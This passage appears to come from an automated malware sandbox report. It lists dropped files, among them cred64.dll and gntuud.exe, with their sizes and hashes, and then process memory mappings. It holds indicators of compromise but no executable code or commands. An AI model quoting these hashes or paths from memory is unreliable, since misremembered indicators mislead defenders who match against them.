                                                fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e

                                              • \Users\Admin\1000030012\syncfiles.dll

                                                Filesize

                                                3.8MB

                                                MD5

                                                bfdb08a3922a436009e70c93b4336cda

                                                SHA1

                                                c29c5331047cfd8db374338e77cb5d676b2e9ccc

                                                SHA256

                                                29662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2

                                                SHA512

                                                fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e

                                              • \Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                8db6951a0d83c98cdf400564eb6da9f5

                                                SHA1

                                                1fcb7cb36a0acec9342f3816a223a44499ca9956

                                                SHA256

                                                6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4

                                                SHA512

                                                a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3

                                              • \Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                8db6951a0d83c98cdf400564eb6da9f5

                                                SHA1

                                                1fcb7cb36a0acec9342f3816a223a44499ca9956

                                                SHA256

                                                6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4

                                                SHA512

                                                a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3

                                              • \Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                8db6951a0d83c98cdf400564eb6da9f5

                                                SHA1

                                                1fcb7cb36a0acec9342f3816a223a44499ca9956

                                                SHA256

                                                6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4

                                                SHA512

                                                a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3

                                              • \Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                8db6951a0d83c98cdf400564eb6da9f5

                                                SHA1

                                                1fcb7cb36a0acec9342f3816a223a44499ca9956

                                                SHA256

                                                6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4

                                                SHA512

                                                a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3

                                              • \Users\Admin\AppData\Local\Temp\1000031001\avicapn32.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                cc320704a370f208678f46083de6115b

                                                SHA1

                                                e51aefe7d64cb2b461e570c8475338cd51b9295f

                                                SHA256

                                                08ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2

                                                SHA512

                                                95aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d

                                              • \Users\Admin\AppData\Local\Temp\1000031001\avicapn32.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                cc320704a370f208678f46083de6115b

                                                SHA1

                                                e51aefe7d64cb2b461e570c8475338cd51b9295f

                                                SHA256

                                                08ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2

                                                SHA512

                                                95aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d

                                              • \Users\Admin\AppData\Local\Temp\1000034001\Emit64.exe

                                                Filesize

                                                8.8MB

                                                MD5

                                                78592d915e780eb7c445a3f797a5c6d1

                                                SHA1

                                                c11cb328c94cff87b033086369fa3cbdf445e265

                                                SHA256

                                                01b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b

                                                SHA512

                                                15fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5

                                              • \Users\Admin\AppData\Roaming\1000032000\umciavi32.exe

                                                Filesize

                                                7.2MB

                                                MD5

                                                d121a0468485d70b575e278d407bb76e

                                                SHA1

                                                aa632a96db84885afe0175cfaafbb7317d5fb0ac

                                                SHA256

                                                4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

                                                SHA512

                                                59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

                                              • \Users\Admin\AppData\Roaming\1000032000\umciavi32.exe

                                                Filesize

                                                7.2MB

                                                MD5

                                                d121a0468485d70b575e278d407bb76e

                                                SHA1

                                                aa632a96db84885afe0175cfaafbb7317d5fb0ac

                                                SHA256

                                                4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

                                                SHA512

                                                59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

                                              • \Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll

                                                Filesize

                                                5.0MB

                                                MD5

                                                bcd2b39f13299558426628c8bf813981

                                                SHA1

                                                decff54ad6d21f632a7cee5f463a828228885b83

                                                SHA256

                                                93d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75

                                                SHA512

                                                b00c1f3c86c2ffa77406baf1cf07c814ba5fc2988076a50689295083676bcc27f04e62263642cd6aab1ba9c80298c1aab11c45e534a4c637e46dca81445765d8

                                              • \Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll

                                                Filesize

                                                5.0MB

                                                MD5

                                                bcd2b39f13299558426628c8bf813981

                                                SHA1

                                                decff54ad6d21f632a7cee5f463a828228885b83

                                                SHA256

                                                93d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75

                                                SHA512

                                                b00c1f3c86c2ffa77406baf1cf07c814ba5fc2988076a50689295083676bcc27f04e62263642cd6aab1ba9c80298c1aab11c45e534a4c637e46dca81445765d8

                                              • \Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll

                                                Filesize

                                                5.0MB

                                                MD5

                                                bcd2b39f13299558426628c8bf813981

                                                SHA1

                                                decff54ad6d21f632a7cee5f463a828228885b83

                                                SHA256

                                                93d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75

                                                SHA512

                                                b00c1f3c86c2ffa77406baf1cf07c814ba5fc2988076a50689295083676bcc27f04e62263642cd6aab1ba9c80298c1aab11c45e534a4c637e46dca81445765d8

                                              • \Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll

                                                Filesize

                                                5.0MB

                                                MD5

                                                bcd2b39f13299558426628c8bf813981

                                                SHA1

                                                decff54ad6d21f632a7cee5f463a828228885b83

                                                SHA256

                                                93d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75

                                                SHA512

                                                b00c1f3c86c2ffa77406baf1cf07c814ba5fc2988076a50689295083676bcc27f04e62263642cd6aab1ba9c80298c1aab11c45e534a4c637e46dca81445765d8

                                              • memory/268-230-0x0000000000000000-mapping.dmp

                                              • memory/296-196-0x0000000000000000-mapping.dmp

                                              • memory/340-90-0x0000000000000000-mapping.dmp

                                              • memory/544-124-0x0000000000400000-0x0000000000442000-memory.dmp

                                                Filesize

                                                264KB

                                              • memory/544-79-0x0000000000418940-mapping.dmp

                                              • memory/544-84-0x0000000000400000-0x0000000000442000-memory.dmp

                                                Filesize

                                                264KB

                                              • memory/568-214-0x0000000140001938-mapping.dmp

                                              • memory/584-204-0x0000000000000000-mapping.dmp

                                              • memory/600-89-0x0000000000000000-mapping.dmp

                                              • memory/752-160-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/752-143-0x0000000000000000-mapping.dmp

                                              • memory/752-145-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/752-91-0x0000000000000000-mapping.dmp

                                              • memory/752-155-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/884-212-0x000007FEEEDC0000-0x000007FEEF91D000-memory.dmp

                                                Filesize

                                                11.4MB

                                              • memory/884-224-0x0000000002694000-0x0000000002697000-memory.dmp

                                                Filesize

                                                12KB

                                              • memory/884-222-0x000000000269B000-0x00000000026BA000-memory.dmp

                                                Filesize

                                                124KB

                                              • memory/884-193-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/884-225-0x000000000269B000-0x00000000026BA000-memory.dmp

                                                Filesize

                                                124KB

                                              • memory/884-211-0x0000000002694000-0x0000000002697000-memory.dmp

                                                Filesize

                                                12KB

                                              • memory/884-195-0x000007FEF2B30000-0x000007FEF3553000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/888-178-0x0000000000000000-mapping.dmp

                                              • memory/888-208-0x0000000000000000-mapping.dmp

                                              • memory/916-151-0x0000000000418940-mapping.dmp

                                              • memory/916-162-0x0000000000400000-0x0000000000442000-memory.dmp

                                                Filesize

                                                264KB

                                              • memory/948-163-0x0000000140000000-0x00000001408CB000-memory.dmp

                                                Filesize

                                                8.8MB

                                              • memory/948-180-0x0000000140000000-0x00000001408CB000-memory.dmp

                                                Filesize

                                                8.8MB

                                              • memory/948-157-0x0000000000000000-mapping.dmp

                                              • memory/948-215-0x0000000140000000-0x00000001408CB000-memory.dmp

                                                Filesize

                                                8.8MB

                                              • memory/1044-87-0x0000000000000000-mapping.dmp

                                              • memory/1168-216-0x0000000000000000-mapping.dmp

                                              • memory/1280-164-0x0000000000000000-mapping.dmp

                                              • memory/1280-176-0x00000000020F0000-0x00000000028F1000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/1280-171-0x00000000020F0000-0x00000000028F1000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/1280-174-0x00000000020F0000-0x00000000028F1000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/1280-173-0x00000000020F0000-0x00000000028F1000-memory.dmp

                                                Filesize

                                                8.0MB

                                              • memory/1348-181-0x0000000000000000-mapping.dmp

                                              • memory/1348-185-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1348-192-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1392-65-0x0000000000400000-0x0000000000442000-memory.dmp

                                                Filesize

                                                264KB

                                              • memory/1392-70-0x0000000000400000-0x0000000000442000-memory.dmp

                                                Filesize

                                                264KB

                                              • memory/1392-60-0x0000000000418940-mapping.dmp

                                              • memory/1476-85-0x0000000000000000-mapping.dmp

                                              • memory/1480-229-0x00000000033B0000-0x0000000003456000-memory.dmp

                                                Filesize

                                                664KB

                                              • memory/1480-138-0x00000000000B0000-0x0000000000D7A000-memory.dmp

                                                Filesize

                                                12.8MB

                                              • memory/1480-136-0x00000000000B0000-0x0000000000D7A000-memory.dmp

                                                Filesize

                                                12.8MB

                                              • memory/1480-130-0x0000000000000000-mapping.dmp

                                              • memory/1508-197-0x0000000000000000-mapping.dmp

                                              • memory/1512-179-0x0000000000000000-mapping.dmp

                                              • memory/1568-202-0x0000000000000000-mapping.dmp

                                              • memory/1576-201-0x0000000000000000-mapping.dmp

                                              • memory/1580-190-0x0000000000000000-mapping.dmp

                                              • memory/1588-54-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1588-64-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1588-59-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1588-61-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1588-58-0x0000000075BE1000-0x0000000075BE3000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1588-63-0x00000000002D0000-0x00000000002D8000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/1648-121-0x0000000000BA0000-0x00000000017A7000-memory.dmp

                                                Filesize

                                                12.0MB

                                              • memory/1648-209-0x0000000000000000-mapping.dmp

                                              • memory/1648-172-0x0000000000900000-0x00000000009EA000-memory.dmp

                                                Filesize

                                                936KB

                                              • memory/1648-115-0x0000000000000000-mapping.dmp

                                              • memory/1648-119-0x0000000000BA0000-0x00000000017A7000-memory.dmp

                                                Filesize

                                                12.0MB

                                              • memory/1648-177-0x0000000010CF0000-0x0000000010EB4000-memory.dmp

                                                Filesize

                                                1.8MB

                                              • memory/1648-122-0x0000000000900000-0x00000000009EA000-memory.dmp

                                                Filesize

                                                936KB

                                              • memory/1648-183-0x0000000000BA0000-0x00000000017A7000-memory.dmp

                                                Filesize

                                                12.0MB

                                              • memory/1648-184-0x0000000000900000-0x00000000009EA000-memory.dmp

                                                Filesize

                                                936KB

                                              • memory/1648-133-0x000000000F250000-0x000000000F263000-memory.dmp

                                                Filesize

                                                76KB

                                              • memory/1648-117-0x0000000000BA0000-0x00000000017A7000-memory.dmp

                                                Filesize

                                                12.0MB

                                              • memory/1648-127-0x0000000010CF0000-0x0000000010EB4000-memory.dmp

                                                Filesize

                                                1.8MB

                                              • memory/1656-88-0x0000000000000000-mapping.dmp

                                              • memory/1660-92-0x0000000000000000-mapping.dmp

                                              • memory/1700-206-0x0000000000000000-mapping.dmp

                                              • memory/1704-210-0x0000000000000000-mapping.dmp

                                              • memory/1724-219-0x000007FEF2B30000-0x000007FEF3553000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1724-221-0x0000000002764000-0x0000000002767000-memory.dmp

                                                Filesize

                                                12KB

                                              • memory/1724-220-0x000007FEEEDC0000-0x000007FEEF91D000-memory.dmp

                                                Filesize

                                                11.4MB

                                              • memory/1724-223-0x000000001B770000-0x000000001BA6F000-memory.dmp

                                                Filesize

                                                3.0MB

                                              • memory/1724-227-0x0000000002764000-0x0000000002767000-memory.dmp

                                                Filesize

                                                12KB

                                              • memory/1724-228-0x000000000276B000-0x000000000278A000-memory.dmp

                                                Filesize

                                                124KB

                                              • memory/1732-68-0x0000000000000000-mapping.dmp

                                              • memory/1732-71-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1732-83-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1732-72-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1732-80-0x0000000000400000-0x0000000000D9A000-memory.dmp

                                                Filesize

                                                9.6MB

                                              • memory/1768-207-0x0000000000000000-mapping.dmp

                                              • memory/1772-205-0x0000000000000000-mapping.dmp

                                              • memory/1840-108-0x00000000022A0000-0x0000000002CB8000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1840-152-0x00000000022A0000-0x0000000002CB8000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1840-93-0x0000000000000000-mapping.dmp

                                              • memory/1840-107-0x00000000022A0000-0x0000000002CB8000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1840-106-0x00000000022A0000-0x0000000002CB8000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1840-105-0x00000000022A0000-0x0000000002CB8000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1864-198-0x0000000000000000-mapping.dmp

                                              • memory/1948-86-0x0000000000000000-mapping.dmp

                                              • memory/1980-203-0x0000000000000000-mapping.dmp

                                              • memory/1988-109-0x000007FEF4E60000-0x000007FEF5878000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1988-110-0x000007FEF4440000-0x000007FEF4E58000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1988-123-0x000007FEF4441000-0x000007FEF4445000-memory.dmp

                                                Filesize

                                                16KB

                                              • memory/1988-100-0x0000000000000000-mapping.dmp

                                              • memory/1988-153-0x000007FEF4440000-0x000007FEF4E58000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1988-111-0x000007FEF4E60000-0x000007FEF5878000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1988-112-0x000007FEF4440000-0x000007FEF4E58000-memory.dmp

                                                Filesize

                                                10.1MB

                                              • memory/1988-118-0x00000000774C0000-0x0000000077669000-memory.dmp

                                                Filesize

                                                1.7MB

                                              • memory/1988-154-0x00000000774C0000-0x0000000077669000-memory.dmp

                                                Filesize

                                                1.7MB

                                              • memory/2036-200-0x0000000000000000-mapping.dmp

                                              • memory/2036-226-0x0000000000000000-mapping.dmp